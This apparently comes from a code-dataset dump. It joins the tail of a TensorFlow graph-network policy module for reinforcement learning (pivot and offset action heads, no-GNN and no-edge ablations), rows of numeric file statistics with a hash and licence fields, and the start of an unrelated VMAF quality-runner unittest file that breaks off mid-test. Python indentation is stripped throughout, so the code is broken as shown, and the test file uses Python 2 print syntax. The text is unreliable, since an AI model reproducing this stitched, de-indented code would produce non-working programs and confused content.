for_pivot_node_logits = tf.squeeze(self.pivot_classifier(tf.concat([pivot_node_feature, tiled_target_information], axis=-1)), axis=2)
squeezed_node_mask = tf.squeeze(node_mask, axis=-1)
squeezed_pivot_mask = tf.cast(tf.math.multiply(tf.squeeze(pivot_mask, axis=-1), squeezed_node_mask), tf.float32)
negative_node_mask = tf.cast((tf.ones_like(squeezed_node_mask) - squeezed_node_mask), dtype=for_pivot_node_logits.dtype) * float(-1e8)
negative_pivot_mask = tf.cast((tf.ones_like(squeezed_pivot_mask) - squeezed_pivot_mask), dtype=for_pivot_node_logits.dtype) * float(-1e8)
masked_for_pivot_node_logits = for_pivot_node_logits + negative_pivot_mask
pivot_node_index = tf.random.categorical(masked_for_pivot_node_logits, 1)
pivot_cce = tf.keras.losses.CategoricalCrossentropy(from_logits=False, reduction=tf.keras.losses.Reduction.NONE)
pivot_probs = tf.nn.softmax(masked_for_pivot_node_logits, axis=-1)
pivot_neglogp = pivot_cce(y_true=tf.one_hot(pivot_node_index, for_pivot_node_logits.shape[-1]), y_pred=pivot_probs)
node_latent_representation = []
for i in range(node_feature.shape[0]):
node_latent_representation.append(action_node_feature[i][tf.squeeze(pivot_node_index)[i]])
'''Shape : (num_envs, hidden_dim)'''
node_latent_representation = tf.stack(node_latent_representation)
per_pivot_available_actions = []
for i in range(node_feature.shape[0]):
per_pivot_available_actions.append(offset_mask[i][tf.squeeze(pivot_node_index)[i]])
per_pivot_available_actions = tf.stack(per_pivot_available_actions)
pd, pi = self.pdtype.pdfromlatent(tf.concat([node_latent_representation, reshaped_target_information], axis=-1))
negative_logits_mask = (tf.ones_like(per_pivot_available_actions) - per_pivot_available_actions) * int(-1e8)
masked_action_logits = pi + tf.cast(negative_logits_mask, pi.dtype)
action = tf.random.categorical(masked_action_logits, 1)
cce = tf.keras.losses.CategoricalCrossentropy(from_logits=False, reduction=tf.keras.losses.Reduction.NONE)
probs = tf.nn.softmax(masked_action_logits, axis=-1)
neglogp = cce(y_true=tf.one_hot(action, pi.shape[-1]), y_pred=probs)
vf = tf.squeeze(self.value_fc(tf.concat([action_graph_feature, pivot_graph_feature, reshaped_target_information], axis=-1)), axis=1)
return tf.cast(action, dtype=tf.int32), vf, None, neglogp, pivot_neglogp, tf.cast(pivot_node_index, dtype=tf.int32)
@tf.function
def value(self, observation):
"""
Compute value estimate(s) given the observation(s)
Parameters:
----------
observation observation data (either single or a batch)
Returns:
-------
value estimate
"""
node_feature, adjacency, available_actions, node_mask, target_information, edge_feature = \
tuple([observation.get(key) for key in ['node_attributes', 'adjacency', 'available_actions', 'node_mask', 'target_information', 'edge_attributes']])
reshaped_target_information = tf.reshape(target_information, [target_information.shape[0] * target_information.shape[1], *target_information.shape[2:]])
# target_information = self.target_network(target_information)
raw_target_information = self.target_network(reshaped_target_information)
reshaped_target_information = tf.reshape(raw_target_information, [target_information.shape[0], -1])
tiled_target_information = tf.tile(tf.expand_dims(reshaped_target_information, axis=1), (1, node_feature.shape[1], 1))
node_feature = self.init_node_fc(node_feature, tiled_target_information)
two_tiled_target_information = tf.tile(tf.expand_dims(tiled_target_information, axis=1), (1, edge_feature.shape[1], 1, 1))
edge_feature = self.init_edge_fc(edge_feature, two_tiled_target_information)
action_node_feature, action_edge_feature = self.gcn_init(node_feature, adjacency, reshaped_target_information, edge_feature, node_mask)
for i in range(len(self.gcn_block)):
action_node_feature, action_edge_feature = self.gcn_block[i](action_node_feature, adjacency, reshaped_target_information, action_edge_feature, node_mask)
pivot_node_feature, pivot_edge_feature = self.pivot_gcn_init(node_feature, adjacency, reshaped_target_information, edge_feature, node_mask)
for i in range(len(self.gcn_block)):
pivot_node_feature, pivot_edge_feature = self.pivot_gcn_block[i](pivot_node_feature, adjacency, reshaped_target_information, pivot_edge_feature, node_mask)
action_graph_feature = tf.math.divide(tf.reduce_sum(tf.multiply(action_node_feature, node_mask), axis = 1),
tf.reduce_sum(node_mask, axis = 1))
pivot_graph_feature = tf.math.divide(tf.reduce_sum(tf.multiply(pivot_node_feature, node_mask), axis = 1),
tf.reduce_sum(node_mask, axis = 1))
result = tf.squeeze(self.value_fc(tf.concat([action_graph_feature, pivot_graph_feature, reshaped_target_information], axis=-1)), axis=1)
return result
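# Design note: unlike PolicyWithValue_Lego_Artificial above, this variant runs
# two separate message-passing stacks over the same initial embeddings, gcn_*
# for the offset-action head and pivot_gcn_* for the pivot head, and the value
# head consumes both pooled graph features.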
class Lego_FC(tf.keras.Model):
def __init__(self, policy_network=None, hidden_dim=64, node_dim = 4, target_info_dim=4, edge_dim=4, layer_num=0):
super(Lego_FC, self).__init__()
# self.feature_fc = fc_relu(hidden_dim + target_info_dim, 'feat_fc_{}'.format(int(layer_num)), hidden_dim, init_scale=np.sqrt(2))
self.feature_fc = fc_relu(hidden_dim, 'feat_fc_{}'.format(int(layer_num)), hidden_dim, init_scale=np.sqrt(2))
def call(self, node_feature, adjacency, target_information, edge_feature, node_mask, training=True):
# tiled_target_information = tf.tile(tf.expand_dims(target_information, axis=1), (1, node_feature.shape[1], 1))
#
# ending_feature = self.feature_fc(tf.concat([node_feature, tiled_target_information], axis=-1))
ending_feature = self.feature_fc(node_feature)
return ending_feature
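# Lego_FC is the graph-free ablation: it applies the same per-node MLP to every
# node and ignores adjacency, edge features and (per the commented-out lines
# above) the target embedding, so no relational information is propagated.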
class PolicyWithValue_Lego_Artificial_NoGNN(tf.Module):
"""
Encapsulates fields and methods for RL policy and value function estimation with shared parameters
"""
def __init__(self, ac_space, policy_network, target_network, hidden_dim, target_hidden_dim, value_network=None, estimate_q=False):
"""
Parameters:
----------
ac_space action space
policy_network keras network for policy
value_network keras network for value
estimate_q q value or v value
"""
self.estimate_q = estimate_q
self.initial_state = None
self.target_network = target_network
# hidden_dim = 64
reshaped_hidden_dim = hidden_dim * 3
target_init_dim = 3
# target_hidden_dim = 64 * 3
reshaped_target_hidden_dim = target_hidden_dim * 3
edge_init_dim = 4
self.init_node_fc = Init_FC(layer_type=0, hidden_dim=reshaped_hidden_dim, target_dim=reshaped_target_hidden_dim)
self.gcn_init = Lego_FC(policy_network, node_dim=reshaped_hidden_dim, hidden_dim=reshaped_hidden_dim, target_info_dim=reshaped_target_hidden_dim, edge_dim=reshaped_hidden_dim, layer_num=1)
self.gcn_block = []
for i in range(2):
temp_gcn = Lego_FC(node_dim=reshaped_hidden_dim, hidden_dim=reshaped_hidden_dim, target_info_dim=reshaped_target_hidden_dim, edge_dim=reshaped_hidden_dim, layer_num=i+2)
self.gcn_block.append(temp_gcn)
self.pivot_gcn_init = Lego_FC(policy_network=None, node_dim=reshaped_hidden_dim, hidden_dim=reshaped_hidden_dim, target_info_dim=reshaped_target_hidden_dim, edge_dim=reshaped_hidden_dim, layer_num=1)
self.pivot_gcn_block = []
for i in range(2):
temp_gcn = Lego_FC(node_dim=reshaped_hidden_dim, hidden_dim=reshaped_hidden_dim, target_info_dim=reshaped_target_hidden_dim, edge_dim=reshaped_hidden_dim, layer_num=i+2)
self.pivot_gcn_block.append(temp_gcn)
self.pivot_classifier = fc(reshaped_hidden_dim + reshaped_target_hidden_dim, 'piv', 1, init_scale=np.sqrt(2))
# Based on the action space, will select what probability distribution type
self.pdtype = make_pdtype((None, reshaped_hidden_dim + reshaped_target_hidden_dim), ac_space, init_scale=np.sqrt(2))
if estimate_q:
assert isinstance(ac_space, gym.spaces.Discrete)
self.value_fc = fc(hidden_dim, 'q', ac_space.n, init_scale=np.sqrt(2))
else:
self.value_fc = fc(reshaped_hidden_dim + reshaped_hidden_dim + reshaped_target_hidden_dim, 'vf', 1, init_scale=np.sqrt(2))
@tf.function
def step(self, observation, pivot_mask, offset_mask, training=True):
"""
Compute next action(s) given the observation(s)
Parameters:
----------
observation batched observation data
Returns:
-------
(action, value estimate, next state, negative log likelihood of the action under current policy parameters) tuple
"""
node_feature, adjacency, available_actions, node_mask, target_information, edge_feature = \
tuple([observation.get(key) for key in ['node_attributes', 'adjacency', 'available_actions', 'node_mask', 'target_information', 'edge_attributes']])
reshaped_target_information = tf.reshape(target_information, [target_information.shape[0] * target_information.shape[1], *target_information.shape[2:]])
# target_information = self.target_network(target_information)
raw_target_information = self.target_network(reshaped_target_information)
reshaped_target_information = tf.reshape(raw_target_information, [target_information.shape[0], -1])
tiled_target_information = tf.tile(tf.expand_dims(reshaped_target_information, axis=1), (1, node_feature.shape[1], 1))
node_feature = self.init_node_fc(node_feature, tiled_target_information)
action_node_feature = self.gcn_init(node_feature, adjacency, reshaped_target_information, edge_feature, node_mask)
for i in range(len(self.gcn_block)):
action_node_feature = self.gcn_block[i](action_node_feature, adjacency, reshaped_target_information, edge_feature, node_mask)
pivot_node_feature = self.pivot_gcn_init(node_feature, adjacency, reshaped_target_information, edge_feature, node_mask)
for i in range(len(self.gcn_block)):
pivot_node_feature = self.pivot_gcn_block[i](pivot_node_feature, adjacency, reshaped_target_information, edge_feature, node_mask)
action_graph_feature = tf.math.divide(tf.reduce_sum(tf.multiply(action_node_feature, node_mask), axis = 1),
tf.reduce_sum(node_mask, axis = 1))
pivot_graph_feature = tf.math.divide(tf.reduce_sum(tf.multiply(pivot_node_feature, node_mask), axis = 1),
tf.reduce_sum(node_mask, axis = 1))
for_pivot_node_logits = tf.squeeze(self.pivot_classifier(tf.concat([pivot_node_feature, tiled_target_information], axis=-1)), axis=2)
squeezed_node_mask = tf.squeeze(node_mask, axis=-1)
squeezed_pivot_mask = tf.cast(tf.math.multiply(tf.squeeze(pivot_mask, axis=-1), squeezed_node_mask), tf.float32)
negative_node_mask = tf.cast((tf.ones_like(squeezed_node_mask) - squeezed_node_mask), dtype=for_pivot_node_logits.dtype) * float(-1e8)
negative_pivot_mask = tf.cast((tf.ones_like(squeezed_pivot_mask) - squeezed_pivot_mask), dtype=for_pivot_node_logits.dtype) * float(-1e8)
masked_for_pivot_node_logits = for_pivot_node_logits + negative_pivot_mask
pivot_node_index = tf.random.categorical(masked_for_pivot_node_logits, 1)
pivot_cce = tf.keras.losses.CategoricalCrossentropy(from_logits=False, reduction=tf.keras.losses.Reduction.NONE)
pivot_probs = tf.nn.softmax(masked_for_pivot_node_logits, axis=-1)
pivot_neglogp = pivot_cce(y_true=tf.one_hot(pivot_node_index, for_pivot_node_logits.shape[-1]), y_pred=pivot_probs)
node_latent_representation = []
for i in range(node_feature.shape[0]):
node_latent_representation.append(action_node_feature[i][tf.squeeze(pivot_node_index)[i]])
'''Shape : (num_envs, hidden_dim)'''
node_latent_representation = tf.stack(node_latent_representation)
per_pivot_available_actions = []
for i in range(node_feature.shape[0]):
per_pivot_available_actions.append(offset_mask[i][tf.squeeze(pivot_node_index)[i]])
per_pivot_available_actions = tf.stack(per_pivot_available_actions)
# pd, pi = self.pdtype.pdfromlatent(self.pdtype_pre_fc(tf.concat([node_latent_representation, target_information], axis=-1)))
pd, pi = self.pdtype.pdfromlatent(tf.concat([node_latent_representation, reshaped_target_information], axis=-1))
negative_logits_mask = (tf.ones_like(per_pivot_available_actions) - per_pivot_available_actions) * int(-1e8)
masked_action_logits = pi + tf.cast(negative_logits_mask, pi.dtype)
action = tf.random.categorical(masked_action_logits, 1)
cce = tf.keras.losses.CategoricalCrossentropy(from_logits=False, reduction=tf.keras.losses.Reduction.NONE)
probs = tf.nn.softmax(masked_action_logits, axis=-1)
neglogp = cce(y_true=tf.one_hot(action, pi.shape[-1]), y_pred=probs)
# vf = tf.squeeze(self.value_fc(self.value_pre_fc(tf.concat([global_graph_feature, target_information], axis=-1))), axis=1)
vf = tf.squeeze(self.value_fc(tf.concat([action_graph_feature, pivot_graph_feature, reshaped_target_information], axis=-1)), axis=1)
# return tf.cast(action, dtype=tf.int32), vf, None, neglogp, tf.cast(pivot_node_index, dtype=tf.int32)
return tf.cast(action, dtype=tf.int32), vf, None, neglogp, pivot_neglogp, tf.cast(pivot_node_index, dtype=tf.int32)
@tf.function
def value(self, observation):
"""
Compute value estimate(s) given the observation(s)
Parameters:
----------
observation observation data (either single or a batch)
Returns:
-------
value estimate
"""
node_feature, adjacency, available_actions, node_mask, target_information, edge_feature = \
tuple([observation.get(key) for key in ['node_attributes', 'adjacency', 'available_actions', 'node_mask', 'target_information', 'edge_attributes']])
reshaped_target_information = tf.reshape(target_information, [target_information.shape[0] * target_information.shape[1], *target_information.shape[2:]])
# target_information = self.target_network(target_information)
raw_target_information = self.target_network(reshaped_target_information)
reshaped_target_information = tf.reshape(raw_target_information, [target_information.shape[0], -1])
tiled_target_information = tf.tile(tf.expand_dims(reshaped_target_information, axis=1), (1, node_feature.shape[1], 1))
node_feature = self.init_node_fc(node_feature, tiled_target_information)
action_node_feature = self.gcn_init(node_feature, adjacency, reshaped_target_information, edge_feature, node_mask)
for i in range(len(self.gcn_block)):
action_node_feature = self.gcn_block[i](action_node_feature, adjacency, reshaped_target_information, edge_feature, node_mask)
pivot_node_feature = self.pivot_gcn_init(node_feature, adjacency, reshaped_target_information, edge_feature, node_mask)
for i in range(len(self.gcn_block)):
pivot_node_feature = self.pivot_gcn_block[i](pivot_node_feature, adjacency, reshaped_target_information, edge_feature, node_mask)
action_graph_feature = tf.math.divide(tf.reduce_sum(tf.multiply(action_node_feature, node_mask), axis = 1),
tf.reduce_sum(node_mask, axis = 1))
pivot_graph_feature = tf.math.divide(tf.reduce_sum(tf.multiply(pivot_node_feature, node_mask), axis = 1),
tf.reduce_sum(node_mask, axis = 1))
result = tf.squeeze(self.value_fc(tf.concat([action_graph_feature, pivot_graph_feature, reshaped_target_information], axis=-1)), axis=1)
return result
class Lego_Message_Passing_No_Edge(tf.keras.Model):
def __init__(self, policy_network=None, hidden_dim=64, node_dim = 4, target_info_dim=4, edge_dim=4, layer_num=0):
super(Lego_Message_Passing_No_Edge, self).__init__()
# self.feature_fc = fc_relu(node_dim, 'feat_fc_{}'.format(int(layer_num)), hidden_dim, init_scale=np.sqrt(2))
self.feature_fc = fc(node_dim, 'feat_fc_{}'.format(int(layer_num)), hidden_dim, init_scale=np.sqrt(2))
self.relu = tf.keras.layers.ReLU()
def call(self, node_feature, adjacency, target_information, edge_feature, node_mask, training=True):
# normalized_adjacency = tf.math.divide(adjacency, tf.reduce_sum(adjacency, axis=(1,2), keepdims=True))
# ending_feature = tf.linalg.matmul(normalized_adjacency, self.feature_fc(node_feature))
# ending_feature = self.relu(tf.linalg.matmul(normalized_adjacency, self.feature_fc(node_feature)))
# ending_feature = tf.linalg.matmul(adjacency, self.feature_fc(node_feature))
ending_feature = self.relu(tf.linalg.matmul(adjacency, self.feature_fc(node_feature)))
        # Edge features pass through this layer unchanged.
return ending_feature, edge_feature
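# Equation sketch for the layer above: H' = ReLU(A (H W)), i.e. plain GCN-style
# propagation without edge features; the edge tensor is returned untouched.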
class PolicyWithValue_Lego_Artificial_NoEdgeGNN(tf.Module):
"""
Encapsulates fields and methods for RL policy and value function estimation with shared parameters
"""
def __init__(self, ac_space, policy_network, target_network, hidden_dim, target_hidden_dim, value_network=None, estimate_q=False):
"""
Parameters:
----------
ac_space action space
policy_network keras network for policy
value_network keras network for value
estimate_q q value or v value
"""
self.estimate_q = estimate_q
self.initial_state = None
self.target_network = target_network
# hidden_dim = 64
reshaped_hidden_dim = hidden_dim * 3
target_init_dim = 3
# target_hidden_dim = 64 * 3
reshaped_target_hidden_dim = target_hidden_dim * 3
edge_init_dim = 4
self.init_node_fc = Init_FC(layer_type=0, hidden_dim=reshaped_hidden_dim, target_dim=reshaped_target_hidden_dim)
self.gcn_init = Lego_Message_Passing_No_Edge(policy_network, node_dim=reshaped_hidden_dim, hidden_dim=reshaped_hidden_dim, target_info_dim=reshaped_target_hidden_dim, edge_dim=reshaped_hidden_dim, layer_num=1)
self.gcn_block = []
for i in range(2):
temp_gcn = Lego_Message_Passing_No_Edge(node_dim=reshaped_hidden_dim, hidden_dim=reshaped_hidden_dim, target_info_dim=reshaped_target_hidden_dim, edge_dim=reshaped_hidden_dim, layer_num=i+2)
self.gcn_block.append(temp_gcn)
self.pivot_gcn_init = Lego_Message_Passing_No_Edge(policy_network=None, node_dim=reshaped_hidden_dim, hidden_dim=reshaped_hidden_dim, target_info_dim=reshaped_target_hidden_dim, edge_dim=reshaped_hidden_dim, layer_num=1)
self.pivot_gcn_block = []
for i in range(2):
temp_gcn = Lego_Message_Passing_No_Edge(node_dim=reshaped_hidden_dim, hidden_dim=reshaped_hidden_dim, target_info_dim=reshaped_target_hidden_dim, edge_dim=reshaped_hidden_dim, layer_num=i+2)
self.pivot_gcn_block.append(temp_gcn)
self.pivot_classifier = fc(reshaped_hidden_dim + reshaped_target_hidden_dim, 'piv', 1, init_scale=np.sqrt(2))
# Based on the action space, will select what probability distribution type
self.pdtype = make_pdtype((None, reshaped_hidden_dim + reshaped_target_hidden_dim), ac_space, init_scale=np.sqrt(2))
if estimate_q:
assert isinstance(ac_space, gym.spaces.Discrete)
self.value_fc = fc(hidden_dim, 'q', ac_space.n, init_scale=np.sqrt(2))
else:
self.value_fc = fc(reshaped_hidden_dim + reshaped_hidden_dim + reshaped_target_hidden_dim, 'vf', 1, init_scale=np.sqrt(2))
@tf.function
def step(self, observation, pivot_mask, offset_mask, training=True):
"""
Compute next action(s) given the observation(s)
Parameters:
----------
observation batched observation data
Returns:
-------
(action, value estimate, next state, negative log likelihood of the action under current policy parameters) tuple
"""
node_feature, adjacency, available_actions, node_mask, target_information, edge_feature = \
tuple([observation.get(key) for key in ['node_attributes', 'adjacency', 'available_actions', 'node_mask', 'target_information', 'edge_attributes']])
reshaped_target_information = tf.reshape(target_information, [target_information.shape[0] * target_information.shape[1], *target_information.shape[2:]])
# target_information = self.target_network(target_information)
raw_target_information = self.target_network(reshaped_target_information)
reshaped_target_information = tf.reshape(raw_target_information, [target_information.shape[0], -1])
tiled_target_information = tf.tile(tf.expand_dims(reshaped_target_information, axis=1), (1, node_feature.shape[1], 1))
node_feature = self.init_node_fc(node_feature, tiled_target_information)
action_node_feature, edge_feature = self.gcn_init(node_feature, adjacency, reshaped_target_information, edge_feature, node_mask)
for i in range(len(self.gcn_block)):
action_node_feature, edge_feature = self.gcn_block[i](action_node_feature, adjacency, reshaped_target_information, edge_feature, node_mask)
pivot_node_feature, edge_feature = self.pivot_gcn_init(node_feature, adjacency, reshaped_target_information, edge_feature, node_mask)
for i in range(len(self.gcn_block)):
pivot_node_feature, edge_feature = self.pivot_gcn_block[i](pivot_node_feature, adjacency, reshaped_target_information, edge_feature, node_mask)
action_graph_feature = tf.math.divide(tf.reduce_sum(tf.multiply(action_node_feature, node_mask), axis = 1),
tf.reduce_sum(node_mask, axis = 1))
# action_graph_feature = tf.reduce_sum(tf.multiply(action_node_feature, node_mask), axis = 1)
pivot_graph_feature = tf.math.divide(tf.reduce_sum(tf.multiply(pivot_node_feature, node_mask), axis = 1),
tf.reduce_sum(node_mask, axis = 1))
# pivot_graph_feature = tf.reduce_sum(tf.multiply(pivot_node_feature, node_mask), axis = 1)
for_pivot_node_logits = tf.squeeze(self.pivot_classifier(tf.concat([pivot_node_feature, tiled_target_information], axis=-1)), axis=2)
squeezed_node_mask = tf.squeeze(node_mask, axis=-1)
squeezed_pivot_mask = tf.cast(tf.math.multiply(tf.squeeze(pivot_mask, axis=-1), squeezed_node_mask), tf.float32)
negative_node_mask = tf.cast((tf.ones_like(squeezed_node_mask) - squeezed_node_mask), dtype=for_pivot_node_logits.dtype) * float(-1e8)
negative_pivot_mask = tf.cast((tf.ones_like(squeezed_pivot_mask) - squeezed_pivot_mask), dtype=for_pivot_node_logits.dtype) * float(-1e8)
masked_for_pivot_node_logits = for_pivot_node_logits + negative_pivot_mask
pivot_node_index = tf.random.categorical(masked_for_pivot_node_logits, 1)
pivot_cce = tf.keras.losses.CategoricalCrossentropy(from_logits=False, reduction=tf.keras.losses.Reduction.NONE)
pivot_probs = tf.nn.softmax(masked_for_pivot_node_logits, axis=-1)
pivot_neglogp = pivot_cce(y_true=tf.one_hot(pivot_node_index, for_pivot_node_logits.shape[-1]), y_pred=pivot_probs)
node_latent_representation = []
for i in range(node_feature.shape[0]):
node_latent_representation.append(action_node_feature[i][tf.squeeze(pivot_node_index)[i]])
'''Shape : (num_envs, hidden_dim)'''
node_latent_representation = tf.stack(node_latent_representation)
per_pivot_available_actions = []
for i in range(node_feature.shape[0]):
per_pivot_available_actions.append(offset_mask[i][tf.squeeze(pivot_node_index)[i]])
per_pivot_available_actions = tf.stack(per_pivot_available_actions)
pd, pi = self.pdtype.pdfromlatent(tf.concat([node_latent_representation, reshaped_target_information], axis=-1))
negative_logits_mask = (tf.ones_like(per_pivot_available_actions) - per_pivot_available_actions) * int(-1e8)
masked_action_logits = pi + tf.cast(negative_logits_mask, pi.dtype)
action = tf.random.categorical(masked_action_logits, 1)
cce = tf.keras.losses.CategoricalCrossentropy(from_logits=False, reduction=tf.keras.losses.Reduction.NONE)
probs = tf.nn.softmax(masked_action_logits, axis=-1)
neglogp = cce(y_true=tf.one_hot(action, pi.shape[-1]), y_pred=probs)
vf = tf.squeeze(self.value_fc(tf.concat([action_graph_feature, pivot_graph_feature, reshaped_target_information], axis=-1)), axis=1)
return tf.cast(action, dtype=tf.int32), vf, None, neglogp, pivot_neglogp, tf.cast(pivot_node_index, dtype=tf.int32)
@tf.function
def value(self, observation):
"""
Compute value estimate(s) given the observation(s)
Parameters:
----------
observation observation data (either single or a batch)
Returns:
-------
value estimate
"""
node_feature, adjacency, available_actions, node_mask, target_information, edge_feature = \
tuple([observation.get(key) for key in ['node_attributes', 'adjacency', 'available_actions', 'node_mask', 'target_information', 'edge_attributes']])
reshaped_target_information = tf.reshape(target_information, [target_information.shape[0] * target_information.shape[1], *target_information.shape[2:]])
# target_information = self.target_network(target_information)
raw_target_information = self.target_network(reshaped_target_information)
reshaped_target_information = tf.reshape(raw_target_information, [target_information.shape[0], -1])
tiled_target_information = tf.tile(tf.expand_dims(reshaped_target_information, axis=1), (1, node_feature.shape[1], 1))
node_feature = self.init_node_fc(node_feature, tiled_target_information)
action_node_feature, edge_feature = self.gcn_init(node_feature, adjacency, reshaped_target_information, edge_feature, node_mask)
for i in range(len(self.gcn_block)):
action_node_feature, edge_feature = self.gcn_block[i](action_node_feature, adjacency, reshaped_target_information, edge_feature, node_mask)
pivot_node_feature, edge_feature = self.pivot_gcn_init(node_feature, adjacency, reshaped_target_information, edge_feature, node_mask)
for i in range(len(self.gcn_block)):
pivot_node_feature, edge_feature = self.pivot_gcn_block[i](pivot_node_feature, adjacency, reshaped_target_information, edge_feature, node_mask)
action_graph_feature = tf.math.divide(tf.reduce_sum(tf.multiply(action_node_feature, node_mask), axis = 1),
tf.reduce_sum(node_mask, axis = 1))
pivot_graph_feature = tf.math.divide(tf.reduce_sum(tf.multiply(pivot_node_feature, node_mask), axis = 1),
tf.reduce_sum(node_mask, axis = 1))
result = tf.squeeze(self.value_fc(tf.concat([action_graph_feature, pivot_graph_feature, reshaped_target_information], axis=-1)), axis=1)
return result
| 51.14715
| 240
| 0.715684
| 6,753
| 49,357
| 4.853695
| 0.031542
| 0.108918
| 0.057967
| 0.031119
| 0.981633
| 0.973518
| 0.970833
| 0.968026
| 0.964548
| 0.95265
| 0
| 0.011372
| 0.180481
| 49,357
| 964
| 241
| 51.200207
| 0.798957
| 0.148834
| 0
| 0.859091
| 0
| 0
| 0.019957
| 0
| 0
| 0
| 0
| 0
| 0.009091
| 1
| 0.054545
| false
| 0.036364
| 0.011364
| 0
| 0.120455
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0ad9aff4ea8fa988a8e9703dad7e58d85dd2bd44
| 96,028
|
py
|
Python
|
python/test/quality_runner_test.py
|
match/vmaf
|
96dd464c08b2b5fd841498b25991c1d04acdb283
|
[
"Apache-2.0"
] | null | null | null |
python/test/quality_runner_test.py
|
match/vmaf
|
96dd464c08b2b5fd841498b25991c1d04acdb283
|
[
"Apache-2.0"
] | null | null | null |
python/test/quality_runner_test.py
|
match/vmaf
|
96dd464c08b2b5fd841498b25991c1d04acdb283
|
[
"Apache-2.0"
] | 1
|
2021-09-06T08:32:00.000Z
|
2021-09-06T08:32:00.000Z
|
from vmaf.tools.stats import ListStats
__copyright__ = "Copyright 2016-2018, Netflix, Inc."
__license__ = "Apache, Version 2.0"
import os
import unittest
from vmaf.config import VmafConfig
from vmaf.core.asset import Asset, NorefAsset
from vmaf.core.quality_runner import VmafLegacyQualityRunner, VmafQualityRunner, \
PsnrQualityRunner, VmafossExecQualityRunner, MsSsimQualityRunner, \
SsimQualityRunner, Adm2QualityRunner, VmafPhoneQualityRunner, VifQualityRunner, \
Vif2QualityRunner, BootstrapVmafQualityRunner, BaggingVmafQualityRunner, NiqeQualityRunner, \
EnsembleVmafQualityRunner
from vmaf.core.result_store import FileSystemResultStore
from testutil import set_default_576_324_videos_for_testing, set_default_flat_1920_1080_videos_for_testing
class QualityRunnerTest(unittest.TestCase):
def tearDown(self):
if hasattr(self, 'runner'):
self.runner.remove_results()
def setUp(self):
self.result_store = FileSystemResultStore()
def test_executor_id(self):
asset = Asset(dataset="test", content_id=0, asset_id=1,
ref_path="dir/refvideo.yuv", dis_path="dir/disvideo.yuv",
asset_dict={'width': 720, 'height': 480})
runner = VmafLegacyQualityRunner([asset], None)
        self.assertEqual(runner.executor_id, 'VMAF_legacy_VF0.2.4c-1.1')
def test_run_vmaf_legacy_runner(self):
        print('test on running VMAF (legacy) runner...')
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
self.runner = VmafLegacyQualityRunner(
[asset, asset_original],
None, fifo_mode=True,
delete_workdir=True,
result_store=None
)
self.runner.run()
results = self.runner.results
        self.assertAlmostEqual(results[0]['VMAF_feature_vif_score'], 0.4460930625000001, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_motion_score'], 4.04982535417, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_adm_score'], 0.93458777083333333, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_ansnr_score'], 23.509571520833337, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_motion_score'], 4.04982535417, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_adm_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_ansnr_score'], 31.271439270833337, places=4)
self.assertAlmostEqual(results[0]['VMAF_legacy_score'], 65.393758021816708, places=4)
self.assertAlmostEqual(results[1]['VMAF_legacy_score'], 96.444658329804156, places=4)
def test_run_vmaf_legacy_runner_10le(self):
        print('test on running VMAF (legacy) runner on 10 bit le...')
ref_path = VmafConfig.test_resource_path("yuv", "src01_hrc00_576x324.yuv422p10le.yuv")
dis_path = VmafConfig.test_resource_path("yuv", "src01_hrc01_576x324.yuv422p10le.yuv")
asset = Asset(dataset="test", content_id=0, asset_id=0,
workdir_root=VmafConfig.workdir_path(),
ref_path=ref_path,
dis_path=dis_path,
asset_dict={'width':576, 'height':324,
'yuv_type':'yuv422p10le'})
asset_original = Asset(dataset="test", content_id=0, asset_id=1,
workdir_root=VmafConfig.workdir_path(),
ref_path=ref_path,
dis_path=ref_path,
asset_dict={'width':576, 'height':324,
'yuv_type':'yuv422p10le'})
self.runner = VmafLegacyQualityRunner(
[asset, asset_original],
None, fifo_mode=False,
delete_workdir=True,
result_store=None
)
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['VMAF_feature_vif_score'], 0.44609306249999997, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_motion_score'], 4.0498253541666669, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_adm_score'], 0.93458777083333333, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_ansnr_score'], 23.509571520833333, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_motion_score'], 4.0498253541666669, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_adm_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_ansnr_score'], 31.271439270833337, places=4)
self.assertAlmostEqual(results[0]['VMAF_legacy_score'], 65.393758021816708, places=4)
self.assertAlmostEqual(results[1]['VMAF_legacy_score'], 96.444658329804156, places=4)
def test_run_vmaf_legacy_runner_with_result_store(self):
        print('test on running VMAF (legacy) runner with result store...')
ref_path, dis_path, asset, asset_original = set_default_576_324_videos_for_testing()
result_store = FileSystemResultStore(logger=None)
self.runner = VmafLegacyQualityRunner(
[asset, asset_original],
None, fifo_mode=True,
delete_workdir=True,
result_store=result_store
)
        print(' running for the first time with fresh calculation...')
self.runner.run()
result0, result1 = self.runner.results
# NOTE: since stored results are actually VMAF_feature's not VMAF's,
# the two paths below shouldn't exist
self.assertFalse(os.path.exists(result_store._get_result_file_path(result0)))
self.assertFalse(os.path.exists(result_store._get_result_file_path(result1)))
        print(' running for the second time with stored results...')
self.runner.run()
results = self.runner.results
self.assertAlmostEqual(results[0]['VMAF_feature_vif_score'], 0.44609306249999997, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_motion_score'], 4.0498253541666669, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_adm_score'], 0.93458777083333333, places=4)
self.assertAlmostEqual(results[0]['VMAF_feature_ansnr_score'], 23.509571520833333, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_vif_score'], 1.0, places=4)
self.assertAlmostEqual(results[1]['VMAF_feature_motion_score'], 4.0498253541666669, places=4)
